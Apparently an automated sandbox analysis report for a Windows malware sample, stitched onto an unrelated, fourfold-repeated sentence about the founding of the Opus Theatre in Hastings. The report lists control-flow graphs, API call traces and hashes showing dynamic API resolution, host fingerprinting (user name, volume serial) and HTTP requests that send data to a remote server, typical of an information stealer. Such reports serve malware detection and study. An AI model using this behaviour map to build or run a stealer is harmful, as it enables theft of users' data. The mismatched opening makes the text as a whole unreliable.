Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                            • API String ID: 2127927946-2218711628
                                            • Opcode ID: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
                                            • Instruction ID: 994efd3a0b10ceab7f5143b43c992d696de16e9dedea517f3aaaefbefb2e1973
                                            • Opcode Fuzzy Hash: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
                                            • Instruction Fuzzy Hash: F0413F79740624ABD7109FE5FC4DADCBF70AB4C702BA08061F90A99190C7F993859B7D

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 769 4048d0-404992 call 41aab0 call 404800 call 41aa50 * 5 InternetOpenA StrCmpCA 784 404994 769->784 785 40499b-40499f 769->785 784->785 786 4049a5-404b1d call 418cf0 call 41ac30 call 41abb0 call 41ab10 * 2 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41ac30 call 41abb0 call 41ab10 * 2 InternetConnectA 785->786 787 404f1b-404f43 InternetCloseHandle call 41ade0 call 40a210 785->787 786->787 873 404b23-404b27 786->873 797 404f82-404ff2 call 418b20 * 2 call 41aab0 call 41ab10 * 8 787->797 798 404f45-404f7d call 41ab30 call 41acc0 call 41abb0 call 41ab10 787->798 798->797 874 404b35 873->874 875 404b29-404b33 873->875 876 404b3f-404b72 HttpOpenRequestA 874->876 875->876 877 404b78-404e78 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41aa50 call 41ac30 * 2 call 41abb0 call 41ab10 * 2 call 41ade0 lstrlenA call 41ade0 * 2 lstrlenA call 41ade0 HttpSendRequestA 876->877 878 404f0e-404f15 InternetCloseHandle 876->878 989 404e82-404eac InternetReadFile 877->989 878->787 990 404eb7-404f09 InternetCloseHandle call 41ab10 989->990 991 404eae-404eb5 989->991 990->878 991->990 992 404eb9-404ef7 call 41acc0 call 41abb0 call 41ab10 991->992 992->989
                                            APIs
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                              • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                              • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404965
                                            • StrCmpCA.SHLWAPI(?,00A72600), ref: 0040498A
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404B0A
                                            • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDE,00000000,?,?,00000000,?,",00000000,?,00A72500), ref: 00404E38
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E54
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E68
                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E99
                                            • InternetCloseHandle.WININET(00000000), ref: 00404EFD
                                            • InternetCloseHandle.WININET(00000000), ref: 00404F15
                                            • HttpOpenRequestA.WININET(00000000,00A72650,?,00A72080,00000000,00000000,00400100,00000000), ref: 00404B65
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                            • InternetCloseHandle.WININET(00000000), ref: 00404F1F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                            • String ID: "$"$------$------$------
                                            • API String ID: 2402878923-2180234286
                                            • Opcode ID: 4f09bf38ad169b6777b6b4ccff9cf14d6377cb73929ec00304caaf0f6e4c38a4
                                            • Instruction ID: 9047d27655e640063cf5e546897bb6ee72beef818384a457e6eae52f2661673c
                                            • Opcode Fuzzy Hash: 4f09bf38ad169b6777b6b4ccff9cf14d6377cb73929ec00304caaf0f6e4c38a4
                                            • Instruction Fuzzy Hash: 41121072A121189ACB14EB91DD66FEEB379AF14314F50419EF10662091EF383F98CF69
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocNameProcessUser
                                            • String ID:
                                            • API String ID: 1206570057-0
                                            • Opcode ID: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
                                            • Instruction ID: 9b82aaaa51ecd1631f431d3f1c3dae0ecd6dc6cababe86b84151973db8bb3773
                                            • Opcode Fuzzy Hash: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
                                            • Instruction Fuzzy Hash: 80F04FB1D49249EBC700DF98DD45BAEBBB8EB45711F10021BF615A2680D7755640CBA1
                                            APIs
                                            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
                                            • ExitProcess.KERNEL32 ref: 0040117E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitInfoProcessSystem
                                            • String ID:
                                            • API String ID: 752954902-0
                                            • Opcode ID: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
                                            • Instruction ID: 7de8415141d8ede1392e5156f4839a36e98c975bb62c62673ce2cce929d499c4
                                            • Opcode Fuzzy Hash: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
                                            • Instruction Fuzzy Hash: 9ED05E74D0530DABCB04DFE09D496DDBB79BB0C315F041656DD0572240EA305441CA66

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 665 419bb0-419bc4 call 419aa0 668 419de3-419e42 LoadLibraryA * 5 665->668 669 419bca-419dde call 419ad0 GetProcAddress * 21 665->669 671 419e44-419e58 GetProcAddress 668->671 672 419e5d-419e64 668->672 669->668 671->672 673 419e96-419e9d 672->673 674 419e66-419e91 GetProcAddress * 2 672->674 676 419eb8-419ebf 673->676 677 419e9f-419eb3 GetProcAddress 673->677 674->673 678 419ec1-419ed4 GetProcAddress 676->678 679 419ed9-419ee0 676->679 677->676 678->679 680 419f11-419f12 679->680 681 419ee2-419f0c GetProcAddress * 2 679->681 681->680
                                            APIs
                                            • GetProcAddress.KERNEL32(74DD0000,00A6C0B0), ref: 00419BF1
                                            • GetProcAddress.KERNEL32(74DD0000,00A6C140), ref: 00419C0A
                                            • GetProcAddress.KERNEL32(74DD0000,00A6C158), ref: 00419C22
                                            • GetProcAddress.KERNEL32(74DD0000,00A6C470), ref: 00419C3A
                                            • GetProcAddress.KERNEL32(74DD0000,00A6C3E0), ref: 00419C53
                                            • GetProcAddress.KERNEL32(74DD0000,00A66718), ref: 00419C6B
                                            • GetProcAddress.KERNEL32(74DD0000,00A654C0), ref: 00419C83
                                            • GetProcAddress.KERNEL32(74DD0000,00A65320), ref: 00419C9C
                                            • GetProcAddress.KERNEL32(74DD0000,00A6C4D0), ref: 00419CB4
                                            • GetProcAddress.KERNEL32(74DD0000,00A6C5A8), ref: 00419CCC
                                            • GetProcAddress.KERNEL32(74DD0000,00A6C5D8), ref: 00419CE5
                                            • GetProcAddress.KERNEL32(74DD0000,00A6C5C0), ref: 00419CFD
                                            • GetProcAddress.KERNEL32(74DD0000,00A65400), ref: 00419D15
                                            • GetProcAddress.KERNEL32(74DD0000,00A6C5F0), ref: 00419D2E
                                            • GetProcAddress.KERNEL32(74DD0000,00A6C308), ref: 00419D46
                                            • GetProcAddress.KERNEL32(74DD0000,00A65560), ref: 00419D5E
                                            • GetProcAddress.KERNEL32(74DD0000,00A6C320), ref: 00419D77
                                            • GetProcAddress.KERNEL32(74DD0000,00A6C338), ref: 00419D8F
                                            • GetProcAddress.KERNEL32(74DD0000,00A65480), ref: 00419DA7
                                            • GetProcAddress.KERNEL32(74DD0000,00A6C440), ref: 00419DC0
                                            • GetProcAddress.KERNEL32(74DD0000,00A65520), ref: 00419DD8
                                            • LoadLibraryA.KERNEL32(00A6C3C8,?,00416CA0), ref: 00419DEA
                                            • LoadLibraryA.KERNEL32(00A6C380,?,00416CA0), ref: 00419DFB
                                            • LoadLibraryA.KERNEL32(00A6C350,?,00416CA0), ref: 00419E0D
                                            • LoadLibraryA.KERNEL32(00A6C458,?,00416CA0), ref: 00419E1F
                                            • LoadLibraryA.KERNEL32(00A6C368,?,00416CA0), ref: 00419E30
                                            • GetProcAddress.KERNEL32(75A70000,00A6C398), ref: 00419E52
                                            • GetProcAddress.KERNEL32(75290000,00A6C488), ref: 00419E73
                                            • GetProcAddress.KERNEL32(75290000,00A6C3F8), ref: 00419E8B
                                            • GetProcAddress.KERNEL32(75BD0000,00A6C3B0), ref: 00419EAD
                                            • GetProcAddress.KERNEL32(75450000,00A65440), ref: 00419ECE
                                            • GetProcAddress.KERNEL32(76E90000,00A66728), ref: 00419EEF
                                            • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00419F06
                                            Strings
                                            • NtQueryInformationProcess, xrefs: 00419EFA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad
                                            • String ID: NtQueryInformationProcess
                                            • API String ID: 2238633743-2781105232
                                            • Opcode ID: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                            • Instruction ID: 85c76ffc39373860cb8090e471c59d53cf6ad49422061259caa86ebb7f60cad9
                                            • Opcode Fuzzy Hash: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                            • Instruction Fuzzy Hash: 4DA16FB5D0A2549FC344DFA8FC889567BBBA74D301708A61BF909C3674E734AA40CF62

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1001 4062d0-40635b call 41aab0 call 404800 call 41aa50 InternetOpenA StrCmpCA 1008 406364-406368 1001->1008 1009 40635d 1001->1009 1010 406559-406575 call 41aab0 call 41ab10 * 2 1008->1010 1011 40636e-406392 InternetConnectA 1008->1011 1009->1008 1030 406578-40657d 1010->1030 1013 406398-40639c 1011->1013 1014 40654f-406553 InternetCloseHandle 1011->1014 1016 4063aa 1013->1016 1017 40639e-4063a8 1013->1017 1014->1010 1019 4063b4-4063e2 HttpOpenRequestA 1016->1019 1017->1019 1021 406545-406549 InternetCloseHandle 1019->1021 1022 4063e8-4063ec 1019->1022 1021->1014 1023 406415-406455 HttpSendRequestA HttpQueryInfoA 1022->1023 1024 4063ee-40640f InternetSetOptionA 1022->1024 1026 406457-406477 call 41aa50 call 41ab10 * 2 1023->1026 1027 40647c-40649b call 418ad0 1023->1027 1024->1023 1026->1030 1035 406519-406539 call 41aa50 call 41ab10 * 2 1027->1035 1036 40649d-4064a4 1027->1036 1035->1030 1039 4064a6-4064d0 InternetReadFile 1036->1039 1040 406517-40653f InternetCloseHandle 1036->1040 1044 4064d2-4064d9 1039->1044 1045 4064db 1039->1045 1040->1021 1044->1045 1048 4064dd-406515 call 41acc0 call 41abb0 call 41ab10 1044->1048 1045->1040 1048->1039
                                            APIs
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                              • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                              • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
                                            • StrCmpCA.SHLWAPI(?,00A72600), ref: 00406353
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                            • HttpOpenRequestA.WININET(00000000,GET,?,00A72080,00000000,00000000,00400100,00000000), ref: 004063D5
                                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0040644D
                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004064BD
                                            • InternetCloseHandle.WININET(00000000), ref: 0040653F
                                            • InternetCloseHandle.WININET(00000000), ref: 00406549
                                            • InternetCloseHandle.WININET(00000000), ref: 00406553
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                            • String ID: ERROR$ERROR$FUA$GET
                                            • API String ID: 3074848878-1334267432
                                            • Opcode ID: 5a8f6151ca7df3080181d83fed655c04dd351c647b39cdf493827c28a0447c5f
                                            • Instruction ID: e13f8b4f5a4983f25bfc964ce73e77e76ffbf3c7ad5d81db2c216f4c68459c1c
                                            • Opcode Fuzzy Hash: 5a8f6151ca7df3080181d83fed655c04dd351c647b39cdf493827c28a0447c5f
                                            • Instruction Fuzzy Hash: 33718171A00218ABDB14DF90DC59FEEB775AF44304F1081AAF6067B1D4DBB86A84CF59

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1058 4119f0-411a1d call 41ade0 StrCmpCA 1061 411a27-411a41 call 41ade0 strtok_s 1058->1061 1062 411a1f-411a21 ExitProcess 1058->1062 1065 411a44-411a48 1061->1065 1066 411c12-411c1d call 41ab10 1065->1066 1067 411a4e-411a61 1065->1067 1069 411a67-411a6a 1067->1069 1070 411bee-411c0d strtok_s 1067->1070 1072 411b41-411b52 StrCmpCA 1069->1072 1073 411ba1-411bb2 StrCmpCA 1069->1073 1074 411bc0-411bd1 StrCmpCA 1069->1074 1075 411b63-411b74 StrCmpCA 1069->1075 1076 411b82-411b93 StrCmpCA 1069->1076 1077 411a85-411a94 call 41ab30 1069->1077 1078 411aad-411abe StrCmpCA 1069->1078 1079 411acf-411ae0 StrCmpCA 1069->1079 1080 411a71-411a80 call 41ab30 1069->1080 1081 411a99-411aa8 call 41ab30 1069->1081 1082 411afd-411b0e StrCmpCA 1069->1082 1083 411b1f-411b30 StrCmpCA 1069->1083 1084 411bdf-411be9 call 41ab30 1069->1084 1070->1065 1087 411b54-411b57 1072->1087 1088 411b5e 1072->1088 1093 411bb4-411bb7 1073->1093 1094 411bbe 1073->1094 1096 411bd3-411bd6 1074->1096 1097 411bdd 1074->1097 1089 411b80 1075->1089 1090 411b76-411b79 1075->1090 1091 411b95-411b98 1076->1091 1092 411b9f 1076->1092 1077->1070 1101 411ac0-411ac3 1078->1101 1102 411aca 1078->1102 1103 411ae2-411aec 1079->1103 1104 411aee-411af1 1079->1104 1080->1070 1081->1070 1105 411b10-411b13 1082->1105 1106 411b1a 1082->1106 1085 411b32-411b35 1083->1085 1086 411b3c 1083->1086 1084->1070 1085->1086 1086->1070 1087->1088 1088->1070 1089->1070 1090->1089 1091->1092 1092->1070 1093->1094 1094->1070 1096->1097 1097->1070 1101->1102 1102->1070 1110 411af8 1103->1110 1104->1110 1105->1106 1106->1070 1110->1070
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcessstrtok_s
                                            • String ID: block
                                            • API String ID: 3407564107-2199623458
                                            • Opcode ID: cd7b43887e4950f8968d8b6d5f82b492b8ff13b2f20a6cd64c505f7d0e6e7de9
                                            • Instruction ID: 24cedd258c0b2a3a786e48f87e23423129f016670b7ad46fccbec0895e921d59
                                            • Opcode Fuzzy Hash: cd7b43887e4950f8968d8b6d5f82b492b8ff13b2f20a6cd64c505f7d0e6e7de9
                                            • Instruction Fuzzy Hash: 00513174B0A109DFCB04DF94D984FEE77B9AF44704F10405AE502AB261E778EA91CB5A

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1111 415760-4157c7 call 415d20 call 41ab30 * 3 call 41aa50 * 4 1127 4157cc-4157d3 1111->1127 1128 4157d5-415806 call 41ab30 call 41aab0 call 401590 call 415440 1127->1128 1129 415827-41589c call 41aa50 * 2 call 401590 call 415510 call 41abb0 call 41ab10 call 41ade0 StrCmpCA 1127->1129 1145 41580b-415822 call 41abb0 call 41ab10 1128->1145 1155 4158e3-4158f9 call 41ade0 StrCmpCA 1129->1155 1159 41589e-4158de call 41aab0 call 401590 call 415440 call 41abb0 call 41ab10 1129->1159 1145->1155 1160 415a2c-415a94 call 41abb0 call 41ab30 * 2 call 4016b0 call 41ab10 * 4 call 401670 call 401550 1155->1160 1161 4158ff-415906 1155->1161 1159->1155 1291 415d13-415d16 1160->1291 1164 415a2a-415aaf call 41ade0 StrCmpCA 1161->1164 1165 41590c-415913 1161->1165 1183 415be1-415c49 call 41abb0 call 41ab30 * 2 call 4016b0 call 41ab10 * 4 call 401670 call 401550 1164->1183 1184 415ab5-415abc 1164->1184 1168 415915-415969 call 41ab30 call 41aab0 call 401590 call 415440 call 41abb0 call 41ab10 1165->1168 1169 41596e-4159e3 call 41aa50 * 2 call 401590 call 415510 call 41abb0 call 41ab10 call 41ade0 StrCmpCA 1165->1169 1168->1164 1169->1164 1270 4159e5-415a25 call 41aab0 call 401590 call 415440 call 41abb0 call 41ab10 1169->1270 1183->1291 1191 415ac2-415ac9 1184->1191 1192 415bdf-415c64 call 41ade0 StrCmpCA 1184->1192 1199 415b23-415b98 call 41aa50 * 2 call 401590 call 415510 call 41abb0 call 41ab10 call 41ade0 StrCmpCA 1191->1199 1200 415acb-415b1e call 41ab30 call 41aab0 call 401590 call 415440 call 41abb0 call 41ab10 1191->1200 1220 415c66-415c71 Sleep 1192->1220 1221 415c78-415ce1 call 41abb0 call 41ab30 * 2 call 4016b0 call 41ab10 * 4 call 401670 call 401550 1192->1221 1199->1192 1296 415b9a-415bda call 41aab0 call 401590 call 415440 call 41abb0 call 41ab10 1199->1296 1200->1192 1220->1127 1221->1291 1270->1164 1296->1192
                                            APIs
                                              • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,00A6DD90,?,004210F4,?,00000000), ref: 0041AB3B
                                              • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415894
                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004158F1
                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415AA7
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 00415440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 00415510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
                                              • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 0041557F
                                              • Part of subcall function 00415510: StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
                                              • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155D3
                                              • Part of subcall function 00415510: strtok.MSVCRT(00000000,?), ref: 004155EE
                                              • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155FE
                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004159DB
                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415B90
                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415C5C
                                            • Sleep.KERNEL32(0000EA60), ref: 00415C6B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpylstrlen$Sleepstrtok
                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                            • API String ID: 3630751533-2791005934
                                            • Opcode ID: d4bfeda11593dca7f9ff7a24f1d2b3bd286b930d2953a7aa732aab3074f6c6cb
                                            • Instruction ID: 55671caa9f17e02bf2b096751d64d2e50591885947f125be0164830bf8637258
                                            • Opcode Fuzzy Hash: d4bfeda11593dca7f9ff7a24f1d2b3bd286b930d2953a7aa732aab3074f6c6cb
                                            • Instruction Fuzzy Hash: 30E1A331A111049BCB14FBA1EDA6EED733EAF54304F40856EF50666091EF386B98CB5A

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1322 417690-4176da GetWindowsDirectoryA 1323 4176e3-417757 GetVolumeInformationA call 418e90 * 3 1322->1323 1324 4176dc 1322->1324 1331 417768-41776f 1323->1331 1324->1323 1332 417771-41778a call 418e90 1331->1332 1333 41778c-4177a7 GetProcessHeap HeapAlloc 1331->1333 1332->1331 1335 4177a9-4177b6 call 41aa50 1333->1335 1336 4177b8-4177e8 wsprintfA call 41aa50 1333->1336 1343 41780e-41781e 1335->1343 1336->1343
                                            APIs
                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004176D2
                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041770F
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417793
                                            • HeapAlloc.KERNEL32(00000000), ref: 0041779A
                                            • wsprintfA.USER32 ref: 004177D0
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
